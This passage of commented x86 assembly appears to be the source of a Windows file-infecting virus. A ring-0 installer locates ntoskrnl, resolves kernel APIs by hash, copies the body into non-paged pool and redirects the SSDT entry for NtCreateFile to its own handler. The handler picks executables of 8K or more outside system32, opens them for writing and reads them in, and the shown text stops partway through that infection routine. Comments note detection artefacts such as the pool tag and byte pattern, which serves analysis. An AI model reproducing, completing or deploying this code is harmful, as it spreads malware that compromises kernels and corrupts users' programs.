addrVirtualLock dd 0
addrVirtualAlloc dd 0
addrVirtualUnlock dd 0
if DEBUG
addrOutputDebugStringA dd 0
addrGetLastError dd 0
addrExitProcess dd 0
endif
;-----------------------------------------------------------------------
; Import tables for ntdll and ADVAPI32, laid out for search_api_addr:
;   8-byte module name (compared byte-for-byte with the first 8 bytes of
;   the export directory's name string), then the 0-terminated table of
;   HASH16 words, then one dword per table entry that
;   find_all_exportfunc fills with the resolved address (0 if unresolved).
; HASH16 and the hs* hash constants are defined outside this chunk.
;-----------------------------------------------------------------------
db 'ntdll.dl'                           ;first 8 bytes of 'ntdll.dll'
ntdll_hash_table equ this word
HASH16 <ZwOpenSection>,hsZwOpenSection
HASH16 <ZwClose>,hsZwClose
dw 0                                    ;end of table
ntdll_hash_addr equ this dword          ;address slots, same order as the table
addrZwOpenSection dd 0
addrZwClose dd 0
db 'ADVAPI32'                           ;first 8 bytes of the ADVAPI32 export name
advapi_hash_table equ this word
HASH16 <GetSecurityInfo>,hsGetSecurityInfo
HASH16 <SetSecurityInfo>,hsSetSecurityInfo
HASH16 <SetEntriesInAclA>,hsSetEntriesInAclA
dw 0                                    ;end of table
advapi_hash_addr equ this dword         ;address slots, same order as the table
addrGetSecurityInfo dd 0
addrSetSecurityInfo dd 0
addrSetEntriesInAclA dd 0
;-----------------------------------------------------------------------
; Ring0Entry - kernel-mode installer. It finishes with retf, so it is
; reached through a far call (the ring-3 side that gets here is outside
; this chunk). Runs with interrupts disabled (cli) and restores all
; registers and flags on exit.
; What the code below does:
;   1. finds ntoskrnl by probing from 80400000h and resolves the APIs in
;      ntos_hash_table (search_api_addr);
;   2. reads the service index out of the ZwCreateFile stub and uses
;      KeServiceDescriptorTable to reach the live NtCreateFile slot;
;   3. returns if that slot already points at a copy of NewNtCreateFile
;      (dword 0e8fa9c60h at handler+5);
;   4. otherwise allocates NonPagedPool (tag 'KCUF'), copies the body
;      there and overwrites the SSDT slot with the pool copy's
;      NewNtCreateFile.
; Observable artefacts: pool tag 'KCUF', an SSDT entry pointing outside
; ntoskrnl, and the 60 9C FA E8 byte pattern at handler+5.
; Registers: ebp = delta base (runtime address of ring0_ip);
; edi -> name+hash table, then the current handler, then the SSDT slot;
; ecx/esi = staging buffer whose address is the imm32 at vir_mem
; (87654321h placeholder, presumably patched by the caller - not visible here).
;-----------------------------------------------------------------------
Ring0Entry:
pushad
pushfd
cli
call ring0_ip                           ;call/pop delta trick
ring0_ip:
pop ebp                                 ;ebp = runtime address of ring0_ip
lea edi,[ebp+ntos_hash_table-8-ring0_ip] ;edi -> 'ntoskrnl' (8 bytes) followed by ntos_hash_table
xor edx,edx
mov dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx ;clear first slot so a failed lookup is detectable
mov ebx,80400000h                       ;lowest address probed for the ntoskrnl image
call search_api_addr
cmp dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx
jz ring0_ret                            ;KeServiceDescriptorTable unresolved -> give up
cld
mov eax,[edi+addrZwCreateFile-(ntos_hash_table-8)]
mov eax,[eax+1]                         ;ZwCreateFile stub starts 'mov eax,imm32': imm32 = service index
mov edx,[edi+addrKeServiceDescriptorTable-(ntos_hash_table-8)]
mov edx,[edx]                           ;edx = ServiceTableBase (first member of the descriptor)
mov edi,[edx+eax*4]                     ;edi = current NtCreateFile handler
mov ecx,[ebp+vir_mem-ring0_ip]          ;ecx = staging buffer (imm32 at vir_mem)
mov [ecx+OldNtCreateFile-_start],edi    ;patch the original handler into the buffer's NewNtCreateFile
mov byte ptr [ecx+IsBusy-_start],0      ;reentrancy flag starts clear
;Check whether already resident: the dword at handler+5 equals
;pushad/pushfd/cli/call (60 9C FA E8), i.e. NewNtCreateFile_start
cmp dword ptr [edi+NewNtCreateFile_start-NewNtCreateFile],0e8fa9c60h
jz ring0_ret ;already resident
lea edi,[edx+eax*4]                     ;edi = &SSDT[index], the slot to overwrite
push large 'KCUF';                      pool tag
push large MemSize
push large 0 ;NonPagedPool
call [ebp+addrExAllocatePoolWithTag-ring0_ip]
or eax,eax
jz ring0_ret                            ;allocation failed
push edi                                ;save the SSDT slot address across the copies
mov esi,87654321h                       ;the imm32 of this instruction is vir_mem
vir_mem equ $-4
push esi
mov edi,esi
lea esi,[ebp+_start-ring0_ip]
mov ecx,vir_first_blk_size
rep movsb                               ;refresh the first block (holds the resolved ntos addresses) into the staging buffer
pop esi                                 ;esi = staging buffer
mov edi,eax                             ;edi = pool block
push large VirSize
pop ecx
rep movsb                               ;copy the whole body into NonPagedPool
pop edi                                 ;edi = &SSDT[index]
add eax,NewNtCreateFile-_start
mov [edi],eax                           ;SSDT[index] = pool copy of NewNtCreateFile
ring0_ret:
popfd
popad
retf
;-----------------------------------------------------------------------
; ntoskrnl import table, same layout as the ntdll/ADVAPI32 tables:
; 8-byte name prefix, 0-terminated HASH16 words, then one address slot
; per entry filled by find_all_exportfunc. Ring0Entry clears the first
; slot before the lookup and tests it afterwards to detect failure.
; ZwClose here uses its own constant (hsNtZwClose) and slot
; (addrNtZwClose), separate from the ntdll entry. The trailing 'dd 0' is
; an extra dword beyond the 8 slots; its use is not visible in this chunk.
;-----------------------------------------------------------------------
db 'ntoskrnl'                           ;first 8 bytes of the kernel's export name
ntos_hash_table equ this word
HASH16 <KeServiceDescriptorTable>,hsKeServiceDescriptorTable
HASH16 <ZwCreateFile>,hsZwCreateFile
HASH16 <ZwReadFile>,hsZwReadFile
HASH16 <ZwWriteFile>,hsZwWriteFile
HASH16 <ExAllocatePoolWithTag>,hsExAllocatePoolWithTag
HASH16 <ZwSetInformationFile>,hsZwSetInformationFile
HASH16 <ZwQueryInformationFile>,hsZwQueryInformationFile
HASH16 <ZwClose>,hsNtZwClose
dw 0                                    ;end of table
ntos_hash_addr equ this dword           ;address slots, same order as the table
eAccess equ $                           ;alias for the first slot
addrKeServiceDescriptorTable dd 0
addrZwCreateFile dd 0
addrZwReadFile dd 0
addrZwWriteFile dd 0
addrExAllocatePoolWithTag dd 0
addrZwSetInformationFile dd 0
addrZwQueryInformationFile dd 0
addrNtZwClose dd 0
dd 0                                    ;spare dword (see header)
;-----------------------------------------------------------------------
; search_api_addr - locate a PE image in memory by probing 64K boundaries
; upward from ebx and resolve its exports.
; In:  ebx = first base address to probe
;      edi -> 8-byte module name followed by the HASH16 table (see the
;             data blocks above)
; Out: the dword slots after the table are filled by find_all_exportfunc
;      (the first slot stays 0 when the image is not found); all
;      registers and flags are restored (pushad/popad, pushfd/popfd)
; Probing unmapped pages would fault, so an exception frame is pushed on
; the fs:[0] list; the handler (search_api_addr_seh) moves the faulting
; context's eip to search_api_addr_@1, i.e. the next 64K step.
;-----------------------------------------------------------------------
;in--ebx is the base to search,edi->the hash table,include dll name
search_api_addr:
pushad
pushfd
call search_api_addr_ip
search_api_addr_ip:
pop ebp                                 ;ebp = runtime address of search_api_addr_ip
push ebp                                ;kept below the exception record, discarded at seh_restore
lea eax,[ebp+search_api_addr_seh-search_api_addr_ip]
push eax                                ;handler address
xor ecx,ecx
push dword ptr fs:[ecx]                 ;previous exception record
mov fs:[ecx],esp                        ;install the frame
sub ebx,10000h
search_api_addr_@1:
add ebx,10000h                          ;next 64K boundary (also the resume point after a fault)
;ntoskrnl can be rebased and there is no guarantee it is found, so do not
;probe above 80500000h, to avoid a blue screen
cmp ebx,80500000h
ja short search_api_addr_seh_restore
cmp word ptr [ebx],'ZM'                 ;DOS header?
jnz short search_api_addr_@1
mov eax,[ebx+3ch]                       ;e_lfanew
add eax,ebx
cmp word ptr [eax],'EP'                 ;PE signature?
jnz short search_api_addr_@1
mov eax,[eax+78h]                       ;DataDirectory[0] = export directory RVA
add eax,ebx                             ;eax -> IMAGE_EXPORT_DIRECTORY
mov edx,[eax+3*4]                       ;Name RVA
add edx,ebx                             ;edx -> exported module name
mov ecx,[edi]
cmp dword ptr [edx],ecx                 ;first 4 name bytes match?
jnz short search_api_addr_@1
mov ecx,[edi+4]
cmp dword ptr [edx+4],ecx               ;next 4 name bytes match?
jnz short search_api_addr_@1
search_api_addr_seh_restore:
xor ecx,ecx
POP DWord Ptr FS:[ecx] ; restore exception chain
pop esi                                 ;discard handler address
pop esi                                 ;discard saved ebp
add edi,8                               ;edi -> hash table (past the 8-byte name)
or ebx,ebx
jz short search_api_addr_ret            ;ebx = 0 -> skip resolution
call find_all_exportfunc                ;eax -> export dir, ebx = base, edi -> table, ecx = 0
search_api_addr_ret:
popfd
popad
retn
;exception handler: resume the probe loop at the next 64K step
search_api_addr_seh:
call search_api_addr_seh_ip
search_api_addr_seh_ip:
pop eax
lea eax,[eax-(search_api_addr_seh_ip-search_api_addr_@1)] ;eax = runtime address of search_api_addr_@1
seh_cont:
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context record (4th handler argument, after the pushed eax and return address)
POP DWord Ptr [EAX + 0B8h] ; context.eip = search_api_addr_@1
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
search_api_addr_end:
;-----------------------------------------------------------------------
; find_all_exportfunc - resolve every HASH16 entry of a table against a
; module's export name table.
; In:  eax -> IMAGE_EXPORT_DIRECTORY, ebx = module base
;      edi -> 0-terminated table of hash words; the dword address slots
;             follow the terminator
;      ecx = 0 (the dec/not/dec sequence below yields the entry count
;             only from that start value; search_api_addr zeroes it)
; Out: each address slot holds the VA of the export whose name hashes to
;      that word, or 0 when no name matched; eax/ebx preserved; ecx =
;      entry count; edx/esi/edi/flags clobbered; DF may be left set by
;      the 'std' below
; Names are read sequentially from the first AddressOfNames entry via
; calc_hash16 (which advances esi past each NUL), so this relies on the
; name strings being stored contiguously in AddressOfNames order.
;-----------------------------------------------------------------------
find_all_exportfunc:
cld
dec ecx                                 ;ecx = -1
push eax
xor eax,eax
repnz scasw                             ;find the 0 word; edi -> address slots
not ecx
dec ecx                                 ;ecx = number of hash entries
push ecx
push edi
rep stosd ;Clear all API address slots
pop edi
sub edi,4                               ;edi -> last hash word; slot i is at [edi+i*4+4]
pop ecx
pop eax
mov esi,[eax+8*4]                       ;AddressOfNames RVA
add esi,ebx ;esi->name RVA array
mov esi,[esi]
add esi,ebx                             ;esi -> first name string
xor edx,edx                             ;edx = name index
push ecx                                ;entry count, popped at find_exportfunc_ret
find_exportfunc:
push ecx                                ;entries still unresolved
find_exportfunc_1:
cmp edx,[eax+6*4]                       ;index == NumberOfNames?
pop ecx
jz short find_exportfunc_ret            ;names exhausted
push ecx
inc edx
push eax
call calc_hash16                        ;ax = hash of the name at esi; esi -> next name
push edi
std
mov ecx,[esp+3*4]                       ;ecx = total entry count
repnz scasw                             ;scan the table backwards for ax; on a hit ecx = entry index
pop edi
pop eax
jnz short find_exportfunc_1             ;no table entry with this hash -> next name
push edx
dec edx                                 ;edx = index of the matching name
push edi
mov edi,[eax+9*4]                       ;AddressOfNameOrdinals RVA
add edi,ebx ;edi->ordinal array
movzx edx,word ptr [edi+edx*2]          ;edx = ordinal
mov edi,[eax+7*4]                       ;AddressOfFunctions RVA
add edi,ebx ;edi->function RVA array
mov edx,[edi+edx*4]
add edx,ebx                             ;edx = export VA
pop edi
mov [edi+ecx*4+4],edx                   ;store in the slot paired with the matching hash entry
pop edx
pop ecx
loop find_exportfunc                    ;stop once every entry is resolved
find_exportfunc_ret:
pop ecx
retn
find_exportfunc_end:
;-----------------------------------------------------------------------
; calc_hash16 - 16-bit CRC-style hash of a NUL-terminated string.
; In:  esi -> string
; Out: eax with ax = hash (the upper half is the rest of the 32-bit
;      shift register); esi -> byte after the terminating NUL;
;      edx preserved; al used as a bit counter; DF cleared; flags clobbered
; Algorithm: shift register seeded with 0FFFFFFFFh; each byte is xor'ed
; into the low byte, then 8 right shifts with HASH16FACTOR xor'ed in
; whenever a 1 bit is shifted out. HASH16FACTOR (and the HASH16 macro
; that precomputes the table entries) are defined outside this chunk.
;-----------------------------------------------------------------------
calc_hash16:
;esi->string
push edx
push 0ffffffffh
pop edx                                 ;edx = seed
cld
load_character:
lodsb                                   ;al = next byte, esi advances
or al, al
jz exit_calc_crc                        ;NUL ends the string
xor dl, al
mov al, 8                               ;al = bits left for this byte
crc_byte:
shr edx, 1
jnc loop_crc_byte
xor edx, HASH16FACTOR                   ;a 1 bit was shifted out
loop_crc_byte:
dec al
jnz crc_byte
jmp load_character
exit_calc_crc:
xchg edx, eax                           ;eax = hash register
;now ax is the hash 16,esi->string after the NULL character after last string
pop edx                                 ;restore caller's edx
ret
calc_hash16_end:
vir_first_blk_size equ $-_start         ;size of the first block (_start .. here); Ring0Entry copies exactly this much into the staging buffer
NTEBP equ 10*4                          ;bytes NewNtCreateFile pushes before reaching its caller's frame: push large (4) + pushad (32) + pushfd (4)
NewNtCreateFile:
push large 12345678h
OldNtCreateFile equ $-4
NewNtCreateFile_start:
pushad
pushfd
cli
call NewNCF_IP_0
NewNCF_IP_0:
NewNCF_IP equ uninit_data
pop ebp
add ebp,NewNCF_IP-NewNCF_IP_0
mov al,0
IsBusy equ $-1
or al,al
jnz NewNCF_ret
inc byte ptr [ebp+IsBusy-NewNCF_IP]
cld
mov esi,[esp+NTEBP+4+2*4] ;POBJECT_ATTRIBUTES
mov ebx,[esi+2*4] ;ObjectName,UNICODE_STRING
movzx ecx,word ptr [ebx]
mov edx,[ebx+4] ;->string
or edx,edx
jz NewNCF_ret_1
or ecx,ecx
jz NewNCF_ret_1
mov eax,[edx+ecx-4]
call eax_to_lowcase
if DEBUG
cmp eax,00650021h ;is '!e'? ; if debug,only infect .e!e
else
cmp eax,00650078h ;is 'xe'?
endif
jnz NewNCF_ret_1
mov eax,[edx+ecx-8]
call eax_to_lowcase
cmp eax,0065002eh ;is '.e'?
jnz NewNCF_ret_1
;Check whether the path include '\system32',avoid infect system file
lea edi,[ebp+VirBuf-NewNCF_IP]
mov esi,edx
xor eax,eax
push ecx
push edi
UniToAnsi_1:
lodsw
call eax_to_lowcase
stosb
loop UniToAnsi_1
pop esi
pop ecx
ChkSystemLoop:
cmp dword [esi],'sys\'
jnz ChkSystemLoopNext
cmp dword [esi+4],'3met'
jz NewNCF_ret_1
ChkSystemLoopNext:
inc esi
loop ChkSystemLoop
xor eax,eax
push eax
push eax
push large 60h ;FILE_SYNCHRONOUS_IO_NONALERT or FILE_NON_DIRECTORY_FILE
push large 1 ;FILE_OPEN
push eax
push large 0a7h ;FileAttributes
push eax
lea ecx,[ebp+temp-NewNCF_IP]
push ecx ;IoStatusBlock
push dword ptr [esp+NTEBP+4+2*4+8*4] ;POBJECT_ATTRIBUTES
mov esi,ecx
push large 40100000h ;SYNCHRONIZE or GENERIC_WRITE
lea edi,[ebp+hHandle-NewNCF_IP]
push edi
call [ebp+addrZwCreateFile-NewNCF_IP]
or eax,eax
jnz NewNCF_ret_1
;Check file size
mov eax,STDPARAM
call GetFInfo
cmp dword ptr [ecx+12],0
jnz NewNCF_ret_1
mov eax,[ecx+8]
mov [ebp+FileLen-NewNCF_IP],eax
cmp eax,2000h ;<8K?
jc NewNCF_ret_1
xor eax,eax
push eax
push eax
push large BUFSIZE
lea ecx,[ebp+VirBuf-NewNCF_IP]
push ecx
push esi ;IoStatusBlock
mov esi,ecx
push eax
push eax
push eax
push dword ptr [edi]
call [ebp+addrZwReadFile-NewNCF_IP]
or eax,eax
jnz NewNCF_ret_2